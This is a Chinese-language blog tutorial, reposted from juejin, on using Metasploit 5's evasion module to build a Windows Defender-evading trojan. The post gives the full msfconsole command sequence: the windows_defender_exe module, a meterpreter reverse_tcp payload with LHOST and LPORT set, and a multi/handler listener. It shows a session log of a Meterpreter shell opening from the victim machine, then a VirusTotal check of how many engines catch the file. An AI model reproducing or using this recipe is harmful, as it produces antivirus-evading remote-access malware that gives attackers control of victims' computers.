简介

几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试

操作

首先打开metasploit

msfconsole

你会看到下面这个界面

➜  ~ msfconsole
This copy of metasploit-framework is more than two weeks old.Consider running 'msfupdate' to update to the latest version..:okOOOkdc'           'cdkOOOko:..xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.:OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOodOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOxlOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOcoOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOolOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;.dOOo'WM.OOOOocccxOOOO.MX'xOOd.,kOl'M.OOOOOOOOOOOOO.M'dOk,:kk;.OOOOOOOOOOOOO.;Ok:;kOOOOOOOOOOOOOOOk:,xOOOOOOOOOOOx,.lOOOOOOOl.,dOd,.=[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]
复制代码

之后使用evasion模块,首先看看有什么evasion模块

msf5 > show evasionevasion
=======Name                             Disclosure Date  Rank    Check  Description----                             ---------------  ----    -----  -----------windows/windows_defender_exe                      normal  No     Microsoft Windows Defender Evasive Executablewindows/windows_defender_js_hta                   normal  No     Microsoft Windows Defender Evasive JS.Net and HTA
复制代码

使用windows/windows_defender_exe这个模块

use windows/windows_defender_exe

查看要配置的参数

show options

msf5 evasion(windows/windows_defender_exe) > show optionsModule options (evasion/windows/windows_defender_exe):Name      Current Setting  Required  Description----      ---------------  --------  -----------FILENAME  oDlIipoP.exe     yes       Filename for the evasive file (default: random)Evasion target:Id  Name--  ----0   Microsoft Windows
复制代码

就一个文件名参数可以配置

set FILENAME bboysoul.exe

之后使用reverse_tcp payload

set payload windows/meterpreter/reverse_tcp

设置端口和ip

set LHOST 10.10.10.186

set LPORT 4444

生成木马文件

exploit

之后打开一个监听端口

use multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

设置主机和端口

set LHOST 10.10.10.186

set LPORT 4444

执行

exploit

接着我们把生成出来的木马在远端要被控制的windows机器上运行我们这里就可以接收到这个回话了

msf5 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 10.10.10.186:4444^@[*] Sending stage (179779 bytes) to 10.10.10.167
[*] Meterpreter session 1 opened (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800
复制代码

上面都是常规操作,之后我们扫描病毒

打开

www.virustotal.com

放入文件扫描

只有33个病毒引擎扫描出来了,说明还可以

欢迎关注Bboysoul的博客www.bboysoul.com

Have Fun

转载于:https://juejin.im/post/5c890af5e51d456d1a45947a

使用metasploit中Evasion模块相关推荐

  1. metasploit 中 exploit模块check方法简介

    Exploit模块的check方法用来检测一台远程主机是否有漏洞能够被利用. check方法默认的实施仅返回check方法不被Exploit模块支持. 当然,一个完整的代码能够从check方法返回如下 ...

  2. 如何从Exploit-DB中添加模块至Metasploit

    如何从Exploit-DB中添加模块至Metasploit 前言 1.搜索漏洞信息 2.使用searchsploit进行本地搜索 3.复制rb文件 4.use载入模块 前言 系统:Linux kali ...

  3. 关于Metasploit 5中测试模块的移植与验证

    前言 如果针对某一程序或软件已经有了相应的渗透模块,此时再去写一个实现类似功能的模块就显得多此一举.然而,并非所有的渗透模块都是基于Metasploit框架开发的,其中有很多是用Perl.Python ...

  4. metasploit中用shodan模块进行网络摄像头查找

    metasploit中用shodan模块进行网络摄像头查找 在kali中使用 msfconsole use auxiliary/gather/shodan_search 登录 https://expl ...

  5. Kail Linux渗透测试教程之在Metasploit中扫描

    Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络 ...

  6. metasploit中msfconsole使用教程,永恒之蓝漏洞复现

    文章目录 前言 msfconsole常用参数 打开和关闭 search 查找模块 use 使用指定模块 info 查看模块的详细信息 show 查看,set设置 run 和 exploit mf17- ...

  7. 40.网络安全渗透测试—[穷举篇3]—[KALI的Metasploit穷举模块的使用]

    我认为:无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录 一.Metasploit的相关概念/下载地址/安装配置步骤 1.Metasploit相关概念: 2.Windo ...

  8. 了解Metasploit中的Payloads(有效载荷)

    什么是payload? payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等.也有人把payloads称 为shellcode. Shellco ...

  9. 站在巨人的肩膀上,Adrian与dlib中face_recongnition模块的贡献者Adam的采访部分翻译

    这篇博客是Adrain对Adam Geitgey的采访部分翻译 Adrian:pyimagesearch博客作者,博士,写了很多关于OpenCV,人脸识别,机器学习,深度学习,计算机视觉等的高质量博客 ...

最新文章

  1. 关于数据表中插入数据报错(pymysql.err.IntegrityError) (1062, “Duplicate entry ‘0112‘ for key ‘‘teacher.PRIMARY‘“)
  2. 【Android Gradle】安卓应用构建流程 ( Java 源码编译 和 AIDL 文件编译 )
  3. linux删除文件退出,在Linux中用于在移动或删除文件时使`tail -f`退出的bash脚本
  4. 【学习笔记】比较分别用prim和kruskal实现最小生成树和算法优化方案
  5. 谈一谈Http Request 与 Http Response
  6. 才博教育:AI口语学习平台上云
  7. pip install mysqlclient报错fails with EnvironmentError: mysql_config not found
  8. Oracle 使用GSON库解析复杂json串
  9. 如何删除选择框的所有选项,然后添加一个选项并使用jQuery选择它?
  10. 未安装任何音频输出设备
  11. macOS Big Sur安装Mojave动态桌面壁纸
  12. 二层交换机与三层交换机区别详解~
  13. 手机管理应用研究【5】——应用杂篇
  14. 阅读器android工程,一种简单的纯粹——全球首款 EINK屏 安卓手机 BOOX E43 工程机测试体验...
  15. stm32f746 linux,【STM32F7】STM32F746-Discovery ucLinux预热
  16. Java应用性能分析工具:async-profiler(配合FlameGraph生成火焰图)
  17. 12306参数重要信息记录
  18. R语言基于lm模型构建线性回归模型(蟋蟀的鸣叫声与温度的关系)、计算回归模型的RMSE指标、计算回归模型的R方指标(R-squared)
  19. Mysql优化之使用短索引
  20. oracle 第一范式,数据库范式之第一范式

热门文章

  1. linux内核驱动识别过程,转载_ARM-Linux内核驱动加载过程思路
  2. MFC底层窗口的实现
  3. Linux (CentOS)安装VNC+XFCE可视化桌面环境 附安装FireFox浏览器
  4. CNN网络量化--Two-Step Quantization for Low-bit Neural Networks
  5. Linux下tar解压到当前目录,zip压缩,tar压缩,tar解压
  6. 复合的赋值运算符例题_Java千问:关于Java语言复合赋值运算符的两个问题,快来瞧瞧!...
  7. html大文件占用内存,[Flutter] 大文件上传之随传随处理(避免占用大量内存)
  8. excel切片器_excel中的超级好用的筛选神器——切片器
  9. ajax异步后台存放购物车表,jQuery购物车插件jsorder用法(支持后台处理程序直接转换成DataTable处理)...
  10. 用计算机创造的音乐,计算机音乐创作(普通组)